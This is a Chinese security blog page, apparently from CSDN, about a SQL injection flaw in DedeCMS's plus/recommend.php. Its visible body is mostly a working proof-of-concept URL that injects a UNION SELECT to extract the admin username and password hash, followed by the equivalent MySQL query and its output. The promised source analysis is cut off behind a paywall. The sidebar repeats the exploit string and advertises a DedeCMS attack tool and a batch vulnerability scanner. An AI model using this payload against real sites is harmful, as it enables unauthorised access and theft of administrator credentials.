[分析]-DedeCMS全版本通杀SQL注入漏洞

最新推荐文章于 2023-11-24 19:53:05 发布
最新推荐文章于 2023-11-24 19:53:05 发布
阅读量5.6k 收藏 1
点赞数
分类专栏: Pentesting php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/24982851
版权
本文详细探讨了DedeCMS全版本存在的SQL注入漏洞,提供了漏洞利用的POC链接,并分析了导致问题的源码部分。通过注入代码示例,揭示了如何在MySQL版本5.0.0以上执行union操作。同时,提到了两个安全相关的网站资源,供进一步研究。
摘要由CSDN通过智能技术生成

[利用]: http://p2j.cn/?p=798
[补丁]: http://www.dedecms.com/pl/#u20140228_5

---------------------------------------------------------------------------------------------------------------------

网络上公布的原始poc格式如下:

http://127.0.0.1/dedecms5.7/plus/recommend.php?&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111

注入成功,等效于执行下面代码:

mysql> SELECT s.*,t.* FROM 
    -> `dede_member_stow` AS s LEFT JOIN 
    -> `dede_member_stowtype` AS t ON s.type=t.stowname 
    -> WHERE s.aid='1' 
    -> AND s.type='\\' or mid=@`\\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `dede_admin` limit 0,1),5,6,7,8,9#@`\\'` ';
    -> ;
+----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+
| id | mid | aid | title                       | addtime | type | stowname | indexname | indexurl |
+----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+
|  1 |   2 |   3 | |admin|f297a57a5a743894a0e4 |       5 | 6    | 7        | 8         | 9        |
+----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+
1 row in set (0.01 sec)

/*!50000union*/  表示若mysql版本高于5.0.0,则执行union操作.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

下面分析以引

最低0.47元/天 解锁文章
Nixawk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DeDeCMSV5.7SP2漏洞复现B
worker___的博客
12-14 2089
一. 实验内容、原理 复现环境 PHP 5.6、DeDeCMSV5.7SP2 正式版(2018-01-09) 复现工具 DeDeCMSV5.7SP2 正式版(2018-01-09) HackBar/Max HacKBar 插件 (后者火狐专有) Proxy SwitchyOmega 插件 Burp Suite 抓包工具 phpstudypro 建站工具 Google Chrome/Firefox 浏览器 二. 实验过程 DeceCMS v5.7 SP2正式版前台任意修改用...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
常见的cms以及历史漏洞
2302_76965792的博客
11-24 126
常见的cms以及历史漏洞
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3803
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
Dedecms V5.7 SP2版本漏洞利用
dahege666的博客
03-07 9463
一、环境搭建 系统:Win10(64位) 工具:Phpstudy 源码:DedeCMS-V5.7-GBK-SP2-Full 二、安装phpstudy https://www.xp.cn/download.html 安装完成后.... 三、下载dedecms源码 http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5....
阿里云提示织梦dedecms模版SQL注入漏洞修复方法
PHP错误汇总
12-13 569
很多用户用到阿里云服务器,会经常碰到各种安提示,不得不说阿里云这一块做的还是很不错的。今天介绍下【阿里云提示织梦dedecms模版SQL注入漏洞修复方法】。 问题原因:dedecms的/member/soft_add.php中,对输入模板参数$servermsg1未进行严格过滤,导致攻击者可构造模版闭合标签,实现模版注入进行GETSHELL。 关于织梦dedecms模板SQL注入漏洞修复方法,主要是文件/member/soft_add.php。 搜索: $urls .= "{dede:link is
Dedecms 搜索模块sql注入
网站守护中心
04-13 1303
Dedecms 搜索模块sql注入描述: Search模块对外部输入参数过滤不严谨,导致产生了sql注入漏洞。 - 收起 Dedecms plus/search.php 文件存在变量覆盖漏洞,导致$typeid能被二次覆盖,产生sql注入漏洞。 Dedecms 搜索模块sql注入危害: 被SQL注入后可能导致以下后果: 1.网页被篡改 2.数据被篡改 - 收起 3. 核心数据被窃
DedeCms v5.7 SQL注入漏洞
网站守护中心
04-13 5381
描述:DedeCms v5.7 SQL注入漏洞WASC Threat Classification 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞形成原因:dedecms v5.7的/member/ajax_membergroup.php脚本对用户提交给“membergroup”参数的数据在用于SQL查询前缺少过滤,
xray扫描器的使用 (长亭科技公司创造)
yyj1781572的博客
11-27 8796
xray扫描器的使用 xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安工具
wLHK-Dedecms漏洞整理.pdf
09-20
从给定的文件信息中,我们可以看到该文件是关于Dedecms漏洞的整理报告,包含了多个漏洞的详情,包括SQL注入漏洞、XSS漏洞等。下面我们将对这些漏洞进行详细的分析和解释。 首先,我们来看第一个漏洞,即Dedecms /...
织梦最新利用工具.exe
06-01
hacker,织梦 一款可以织梦的攻击工具。
商业源码-编程源码-DedeCms v5.6 GBK build 20100928.zip
06-15
- 由于是较旧的版本,可能存在已知的安漏洞,使用时需注意定期更新和安维护,防止被黑客攻击。 - 建议升级到最新稳定版,以获得最新的安补丁和功能改进。 6. **社区支持**: - DedeCms拥有活跃的用户社区...
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
DedeCMS 存储型xss漏洞1
08-03
漏洞在DedeCMS V5.7 UTF8 SP2 版本中被发现,发布日期为2017年3月15日。当DedeCMS的Shop模块开启时,此漏洞就有可能被利用。 ### 漏洞触发 漏洞的触发点位于 `/dede/shops_delivery.php` 文件中的 `des` 参数。...
DedeCMS版本SQL注入漏洞利用代码
weixin_34007291的博客
03-21 486
EXP: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'   or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select   CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`  limit+0,1...
DedeCMS反馈页面SQL注入漏洞
网站守护中心
04-13 1122
DedeCMS反馈页面SQL注入漏洞描述: 目标网站存在SQL注入漏洞。 1.SQL注入攻击就是攻击者过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞形成原因:DedeCMS的plus\feedback.php中对变量 $typeid未做过滤,导致SQL注入漏洞。 危害: 被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改. Ded
dedecms tag.php注入漏洞分析与利用工具
weixin_30267785的博客
08-25 476
author:toby57 [www.toby57.cn] date:2008-08-18 Dedecms算是使用比较广泛的PHP整站系统了,在被使用的同时系统的安性也被人们关注。在以前dedecms也爆过不少漏洞,官方都很快出了补丁,前几天80sec公布了注射漏洞 http://www.80sec.com/dedecms-sql-injection.html,其实这个系统也受最近很流行的...
dedecms sql注入漏洞
最新发布
06-28
Dedecms SQL注入漏洞是指在Dedecms系统中存在的一种安漏洞,攻击者可以过该漏洞向数据库中注入恶意代码,从而实现对网站的攻击和控制。该漏洞主要是由于Dedecms系统中的parse_str函数存在变量覆盖问题,攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值